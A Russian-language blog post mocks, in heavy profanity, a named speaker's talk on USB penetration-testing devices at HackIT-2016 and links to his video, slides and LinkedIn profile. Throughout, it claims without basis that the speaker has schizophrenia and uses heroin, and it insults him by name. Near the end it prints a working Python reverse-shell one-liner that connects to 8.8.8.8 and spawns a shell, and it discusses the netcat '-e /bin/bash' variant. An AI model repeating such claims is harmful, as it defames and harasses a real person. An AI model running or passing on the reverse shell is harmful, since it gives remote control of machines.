Фанбой Mr.Robot'а на HackIT-2016: "Мои пруфы очень специфичны"
Дорогие ебаные читатели и ебанная Редакция, хочу поделиться своими впечатлениями от посещения конференции HackIT, проходившей недавно в Харькове, цена билета на которую колебалась от 200 до 1500 гривен. Идя на конференцию, где должны были выступать и соревноваться в CTF лучшие из лучших специалистов в Украине по информационной безопасности, меня не покидала мысль что эта конференция — очередная бессмысленная пафосная хуйня и бесполезная трата времени, в чем я и убедился позже.
Для того чтобы прояснить примерный уровень большинства выступающих, мною и опытным врачом-психотерапевтом был проанализирован доклад Алексея Мисника «HackIT-2016. USB устройства для пентеста.» Что из этого получилось читайте далее.
«Стартуем !» — именно этой фразой Алексей начинает свой охуитительный доклад. С первых минут видео можно оценить как превосходное ораторское искусство докладчика так и глубокий стиль изложения материала, восхитительную работу оператора также нельзя оставить без внимания, но вернемся к самому Алексею.
Алексей будучи фанатом сериала «Mr. Robot» взял лучшее от этого персонажа себе, а именно: шизофрению и любовь к тяжелым наркотикам, доказательством этого может служить несвязная речь, непредсказуемая смена настроения, тремор конечностей, при этом Алексей не забыл отбросить малозначительные качества: сообразительность, целеустремленность, выдающиеся навыки.
Со всем вышеперечисленным (наркотиками и шизофренией) Алексей решил выступить на конференции, поскольку речь Алексея может быть не понятна обычному человеку, с помощью психотерапевта давайте разберем бред больного. С полным 44-минутным видео вы можете ознакомится по ссылке внизу материала, а здесь нарезка самого «сока» выступления:
дисклеймер: видео может вызвать укачивание и тошноту, благодаря мастерской работе оператора — стабилизация изображения это для слабаков, давайте лучше пальцами напостой крутить zoom-in/zoom-out
Разбираем перлы:
-Все думают шо есть вот mass storage, что-то можно с ним сделать — мы его видим, на самом деле вся уязвимость только в контроллере
Алексей бормочет что-то невнятное подменяя общепризнанные значения терминов своими вымыслами. По мнению врача это может быть вызвано продолжительным употреблением героина.
-Я просто проводил два года аудит в гос. структурах по безопасности — поэтому я все там знаю идеально
Делая отступления от темы доклада Алексей, как бывалый специалист не забывает и повыебываться своими «достижениями».
-Там MS08 подходил к любому компу просто
Больной впадая в бессознательное состояние продолжает нести несвязный бред, на этот раз причиной приступа служит код «MS08». «Что же такое MS08?» этот вопрос возникает в голове у неподготовленного зрителя, опытный врач подсказывает что скорее всего речь идет об уязвимости MS08_067 в системах Windows, эксплуатируя которую можно получить полный доступ к уязвимой системе. Приступ заканчивается и Алексей продолжает.
-Он ничем себя не выдаст, вы просто приходите его снимаете, забираете, считываете то шо вам надо
этой фразой Алексей описал все тонкости работы с аппаратным кейлоггером на основе USB, после этого врач сделал неутешительный вывод: пациент — мамкин кулхацкер, занимающийся суходрочкой и запускающий эксплойты в многострадальный localhost.
-Я проводил как-то аудит, мы смогли взломать одну из машин сотрудника
Алексей признает раздвоения личности, при лечении шизофрении это очень важно. Алексей помнит что начинал аудит он один «Я проводил как-то аудит», но за тем личность раздваивается «мы смогли взломать одну из машин сотрудника». Врач рекоменует пациенту во избежания обострений не проводить больше аудиты. И вообще уйти нахуй со сцены.
-Я тоже юзер MacBook, кке, мака
Алексей периодически делает отступления чтобы повыебываться. На этот раз причиной выебонов стал MacBook которым владеет пациент.
-Я сидел в военном институте мы ломали WI-FI соседнего дома
Как настоящий мамкин хакер Алексей не забывает упомянуть о криминальном прошлом. Проникновение в домашнюю сеть граждан Украины используя программно-технические средства и нарушение 361 статьи криминального кодекса Украины по мнению Алексея — достижение о котором стоит рассказать в своем докладе. Сказочный долбоеб — резюмирует психотерапевт.
-Да я выпускник военного института просто, поэтому что бы вы знали, если Вам надо то можно брутить с соседнего дома WI-FI
Этой фразой Алексей призывает слушателей нарушать закон Украины «Если надо — то можно». Если надо денег — отожми денег, если надо подарить девушки сережки — сорви их с прохожей старушки. Для завершения образа Алексею не хватает только куполов на спине и золотого зуба.
-То что залоченная винда или мак выдают NTLM хеш при подключении USB устройства, есть при чем официальная статья как это сделать и мы это сделали!
Невероятно, аплодисменты, сделать что-то шаг за шагом имея инструкцию невообразимо сложно, восхитительно !
«К чему вообще этот доклад ?», «Где оригинальный контент ?», «Что этот уебан тут делает ?» — Именно эти вопросы задает большинство специалистов в области информационной безопасности слушая Алексея.
-А от Mac OS, в чем сама уязвимость атаки ?
«Уязвимость атаки» — таким беспощадным для сознания здравомыслящего человека оборотом Алексей пытается выбить врача из игры, но врач смахнув пот со лба, продолжает анализировать состояния больного дальше.
-Ну был там как-то CTF c SQLIte, база данных, cкуля, но ничего более, яж не пишу под мобильные
Что это вообще за нахуй ? Схуяли платить 1500 грн за вход на конференцию где говорят «скуля» вместо SQL-injection ? Все больше вопросов остается без ответа.
-Ну это так для затравки, вторая часть будет намного круче
Да, да внимательно Вас слушаем, продолжайте. «Пора вызывать санитаров и срочно госпитализировать больного» — шепотом добавляет психотерапевт.
-Я сделал очень быстро и с первого раза
Алексей прибегает к излюбленной стратегии — отступление для выебонов.
На этом этапе больше половины доклада позади, но в чем смысл доклада и где оригинальный контент не понятно.
-Заливая вместе с прошивкой получаете уязвимую флешку
Алексей снова бормочет что-то невнятное употребляя половину слов не к месту и скорее всего сам не понимает о чем рассказывает, надеясь на лучшее врач рекомендует увеличить дозы назначенных Алексею препаратов.
-Он не пройдет на большинстве систем потому что строчка /bin/bash шоб дать shell нам на удаленном компьютере он не всегда входит в стандартный пакет и чтобы он заработал его нужно подключить ситуация меняеться время от времени так шо надо тестировать на разных системах, я тестировал на Ubuntu 14.04 и без подкачки дополнений вот этот -e /bin/bash shell у меня не получился
Ну что же, для того чтобы понять насколько Алексей хороший специалист врач решает разобрать эту реплику полностью. В nc флаг -e нужен для того чтобы перенаправить STDOUT в STDIN программы обозначенной данным флагом, в современных Linux дистрибутивах утилита nc не поддерживает этот флаг. В данном случае Алексей надеться сделать reverse shell и вместо того чтобы добавить в доклад хоть немного оригинального контента он доставляет на машину, которую будет атаковать, пакеты которых в реальной жизни там не будет. Может проще сразу поставить rootkit ? Есть масса других способов сделать reverse shell, например использывать интерпретаторы python и perl которые есть в каждом современном Linux дистрибутиве, например: python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((«8.8.8.8», 666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([«/bin/sh»,»-i»]);’. Не понимая почему Алексей решил заняться информационной безопасностью а не садоводчеством, врач продолжает слушать жалобы больного.
-Кто знает шо такое reverse shell ? Так ну процентов 30, окей
На этом моменте ситуация окончательно прояснилась, причина по которой Алексея не обоссали во время доклада проста, 70%+ сидящих в аудитории — мечтающие «вайтишники» накопив денег на доставке пиццы и раздаче листовок тут же решили их спустить на курсы от Пивоварова и билет на конференцию от маминых хакеров в надежде чему-то научиться и не повторить судьбу последнего.
-Я защищен Avast’ом вы все видите, security есть
«…но не в этом здании и не в моем докладе, а где-то, я хочу верить !» — забывает добавить Алексей.
-Вопрос: кто знает про атаку DNS туннелирование шо это такое ?
Про «атаку DNS туннелирования» не знает даже Иисус, Аллах и Будда вместе взятые. Эта атака существует только в героиновых грезах Алексея. «DNS Tunneling» — это не атака, а метод обхода механизмов защиты основанный на передачи данных используя DNS запросы, применяется в основном для эксфильтрации данных — поясняет врач.
-Мой доклад окончен, если есть вопросы — задавайте
После доклада Алексея у большинства людей был только один вопрос: «Кто блядь вернет время и деньги потраченные на эту хуйню ?».
Краткое резюме всего доклада: ничего вместо рассказа о поиске и использовании готовых решений, притом зачастую нет понимая как работают эти самые решения нет, и даже вместо того чтобы написать сотню строчек кода для автоматизации процесса подготовки флешки для таргетированной атаки и придать смысл своему докладу, Алексей продолжает радостно рапортовать о его детских экспериментах.
«Тяжелый случай, скорее всего не излечим.» — говорит доктор после знакомства с пациентом. С чем сложно не согласиться. Но когда с Алексеем все стало ясно, появились другие вопросы связанные с организацией и качеством конференций по информационной безопасности в Украине. А это уже совсем другая история…
Ссылки.
1. Полное видео доклада (44 минуты): https://www.youtube.com/watch?v=72xFaXDXAok
2. Слайды: http://www.slideshare.net/HackIT-ukraine/usb-66977209
3. LinkedIn: https://www.linkedin.com/in/oleksii-misnik-08158255
4. HackIt http://2016.hackit-ukraine.com/rus